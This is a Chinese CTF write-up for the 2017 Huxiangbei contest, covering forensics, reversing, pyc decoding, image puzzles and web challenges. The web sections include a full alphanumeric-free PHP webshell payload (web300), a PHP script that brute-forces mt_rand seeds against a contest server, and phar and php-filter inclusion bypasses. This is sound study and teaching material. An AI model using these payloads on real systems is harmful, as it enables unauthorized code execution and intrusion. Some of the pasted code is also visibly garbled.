2017-12-03

2017湖湘杯writeup

部分题解

流量分析

导出http 发现有个flag.zip
解压后文件内容是rgb的像素点
脚本：

#-*- coding:utf-8 -*-
from PIL import Image
import re
a=98457
for k in range(1, a+1):
    if (a % k == 0) and (k < a):
        x = k
        y = int(a // k)
        print x,y
        im = Image.new("RGB",(x,y))
        file = open('ce.txt')
            for i in range(0,x):
            for j in range(0,y):
                line = file.readline()#
                rgb = line.split(",")
                im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))
        im.show()

Re4newer

ida打开
定位到判断函数
mark

flag 是v4和0x22的异或

mark

然后web狗手撕的 :)

Misc200

当时没做出来，因为没有去调试。。
拖到jeb里看一下有一个加密，一个解密文件，解密文件没东西，看了下加密，就是普通的和密码进行异或。所以就是要找到password，并没有找到。
我们进行调试，在加密一下就可以得到原文了，而且发现此时密码已经记住，然后把加密文件扔进去，就可以得到flag图片了

pyc分析

2015xdctf原题
uncompyle6 revPyc.pyc

反编译出源码

查看globals()

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 1, in <lambda>
IOError: [Errno 2] No such file or directory: 'flag.txt'
>>> globals()
{'string': <module 'string' from 'D:\Python27\lib\string.pyc'>, '__builtins__': <module '__builtin__' (built-in)>, '__package__': None, 'i': 654, 'table': '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', 'encode': <function encode at 0x02836C30>, '__name__': '__main__', 'getbit': <function getbit at 0x028364B0>, '__doc__': None, 'setbit': <function setbit at 0x02815E30>}

整理完代码

[data['i'] = ((table.index(data['i']) + 1))
__this() for __l['buf'] in [(
             j=(i / 6) * 8 + (i % 6)
             setbit(buf, i, getbit(data, j))
              if __i is not __sentinel else __after())(next(__items, __sentinel)))())
        (iter(xrange((__l['_len'] * 6)))
 for __g['table'] in [(string.printable.strip())]][0] for __g['string'] in [(__import__('string', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))

加密方式就出来了，把原字符在table的index+1后，把后6位保存到文件里,由于64==38，我就每3字节一起decode，decode3b函数

exp

python
#Embedded file name: rev300.py
__g = globals()
__y = (lambda f: (lambda x: x(x))(lambda y: f(lambda : y(y)())))
string = (__import__('string', __g, __g))
table = (string.printable.strip())
"""
setbit = (lambda p, pos, value: (lambda __l: [ [ [ (lambda __target, __slice, __value: [ (lambda __target, __slice, __value: [ __l['p'] for __target[__slice] in [(lambda __old: (lambda __ret: (__old | __value if __ret is NotImplemented else __ret))(getattr(__old, '__ior__', lambda other: NotImplemented)(__value)))(__target[__slice])] ][0])(__l['p'], __l['cpos'], __l['value'] << __l['bpos']) for __target[__slice] in [(lambda __old: (lambda __ret: (__old & __value if __ret is NotImplemented else __ret))(getattr(__old, '__iand__', lambda other: NotImplemented)(__value)))(__target[__slice])] ][0])(__l['p'], __l['cpos'], ~(1 << __l['bpos'])) for __l['bpos'] in [__l['pos'] % 8] ][0] for __l['cpos'] in [__l['pos'] / 8] ][0] for __l['p'], __l['pos'], __l['value'] in [(p, pos, value)] ][0])({}))
setbit.__name__ = 'setbit'
getbit = (lambda p, pos: (lambda __l: [ [ [ __l['p'][__l['cpos']] >> __l['bpos'] & 1 for __l['bpos'] in [__l['pos'] % 8] ][0] for __l['cpos'] in [__l['pos'] / 8] ][0] for __l['p'], __l['pos'] in [(p, pos)] ][0])({}))
getbit.__name__ = 'getbit'
encode =  (lambda data, buf: (lambda __l: [ [ (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ [ __this() for __l['data'][__l['i']] in [table.index(__l['data'][__l['i']]) + 1] ][0] for __l['i'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(xrange(__l['_len'])), lambda : (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ [ [ __this() for __l['buf'] in [setbit(__l['buf'], __l['i'], getbit(__l['data'], __l['j']))] ][0] for __l['j'] in [__l['i'] / 6 * 8 + __l['i'] % 6] ][0] for __l['i'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(xrange(__l['_len'] * 6)), lambda : __l['buf'], []), []) for __l['_len'] in [len(__l['data'])] ][0] for __l['data'], __l['buf'] in [(data, buf)] ][0])({}))
encode.__name__ = 'encode'
"""
def setbit(p,pos,value):
    bpos = pos % 8
    cpos = pos / 8
    s = p
    s[cpos] = p[cpos] & (~(1 << bpos))
    s[cpos] = p[cpos] | (value << bpos)
    return s
def getbit(p,pos):
    bpos = pos % 8
    cpos = pos / 8
    return p[cpos] >> bpos & 1
def encode(data, buf):
    indexdata = []
    for i in xrange(len(data)):
        indexdata.append(table.index(data[i]) + 1)
    res = buf
    for i in xrange(len(data)*6):
        j = i / 6 * 8 + i % 6
        setbit(res, i, getbit(indexdata, j))
    return res
def encrypt():
    fin = open('key.txt', 'r')
    s = fin.read().strip()
    fin.close()
    ss = ([])
    sss = ([])
    __items = iter(s)
    __after = (lambda : [ [ (lambda __items, __after, __sentinel: __y(lambda __this: lambda : (lambda __i: ([ (lambda __value: [ __this() for __g['sssss'] in [(lambda __ret: (__g['sssss'] + __value if __ret is NotImplemented else __ret))(getattr(__g['sssss'], '__iadd__', lambda other: NotImplemented)(__value))] ][0])(chr(c)) for __g['c'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))())(iter(ssss), lambda : [ (fout.write(sssss), (fout.close(), None)[1])[1] for __g['fout'] in [open('key1.enc', 'wb+')] ][0], []) for __g['sssss'] in [''] ][0] for __g['ssss'] in [encode(ss, sss)] ][0])
    __sentinel = ([])
    __y(lambda __this: lambda : (lambda __i: ([ (ss.append(c), (sss.append(0), __this())[1])[1] for __g['c'] in [__i] ][0] if __i is not __sentinel else __after()))(next(__items, __sentinel)))()
def decrypt():
    fin = open('key.enc','rb')
    cipher = fin.read()
    plain = ''
    def decode3b(s):
        a = s >> 16
        b = (s >> 8) & 0xFF
        c = s & 0xff
        sa = bin(a)[2:].zfill(8)
        sb = bin(b)[2:].zfill(8)
        sc = bin(c)[2:].zfill(8)
        return table[int(sa[2:], 2)] + table[int(sb[4:] + sa[:2], 2)] + table[int(sc[6:] + sb[:4], 2)] + table[int(sc[:6], 2)]
    for i in xrange(0,len(cipher),3):
        s = int(cipher[i:i+3].encode('hex'),16)
        plain += decode3b(s)
    print plain
    return ''.join(table[(table.index(c) + 63) % 64] for c in plain)
if __name__ == '__main__':
    print decrypt()
    print table[table.index("d")+64]
    #Key:9733c070b2138e5f

由于只保留了最后6位，所以在table里的index大于64的特殊字符是没有的，key后面的d其实是:

web200

根据http://118.190.87.135:10080/?op=home
尝试文件包含 ../ 关键字被禁
使用php filter 读取文件
common.php 发现自动添加.png后缀

mark

可以使用phar协议绕过

mark

但是php 命令执行相关函数被禁可以使用php函数读取

mark

简单的安卓

jeb载入即可

mark

热身运动

gif 一帧帧的看

发现坐标可以和base64 一一对应最后=补全即可

ZmxhZ3sxdF8xNV9mdW5ueX0=

flag{1t_15_funny}

random

.index.php.swp
发现源码泄露

mark

简单的mt_srand随机数爆破 session置空的绕过

脚本如下

1
2

<?php
function create_password($pw_length = 10){ $randpwd = ""; for ($i = 0; $i < $pw_length; $i++){ $randpwd .= chr(mt_rand(100, 200)); } return $randpwd; } $t = time()-20; for($i = $t; $i < $t + 40; $i++){ mt_srand($i); $pwd=create_password(); $curl = file_get_contents("http://114.215.138.89:10080/index.php?pwd=$pwd&login="); echo $curl.'<br>'; }

web300

mark

阅读源码构造不含上述字符的shell即可

根据p牛博客
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

‘a’++ => ‘b’，’b’++ => ‘c’… 所以，我们只要能拿到一个变量，其值为a，通过自增操作即可获得a-z中所有字符。
那么，如何拿到一个值为字符串’a’的变量呢？
巧了，数组（Array）的第一个字母就是大写A，而且第4个字母是小写a。也就是说，我们可以同时拿到小写和大写A，等于我们就可以拿到a-z和A-Z的所有字母。
在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array：
再取这个字符串的第一个字母，就可以获得’A’了
payload:
http://127.0.0.1:8000/web300.php?content=$_=[].'';$_=$_[']'=='['];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

url 编码一下提交
getshell
cat flag.php

mark

Misc300

脚本：

import pickle
from PIL import Image
with open('pixels.jpg.pkl') as f:
       data= pickle.loads(f.read().encode('utf8'))
white_pixels = [(int(e[0]), int(e[1])) for e in data[1:]]
width = max([p[0] for p in white_pixels]) + 10
height = max([p[1] for p in white_pixels])+ 10
image = Image.new('1', (width, height), 0)
pixels = image.load()
for pixel in white_pixels:
       pixels[pixel[0],pixel[1]] = 255
image.show()

mark

漫画图作者为billwatterson，就是flag

web400

这个题好像没人做出来。。。
赛后听人说是先用ssrf 302读文件，上传文件页面需要session[‘token’]=1，然后开启debug请求user.php获取session，利用session上传文件,common.php可以自动包含文件，include参数加入赋值等于upload，会自动包含ini文件。
没有环境也没有复现。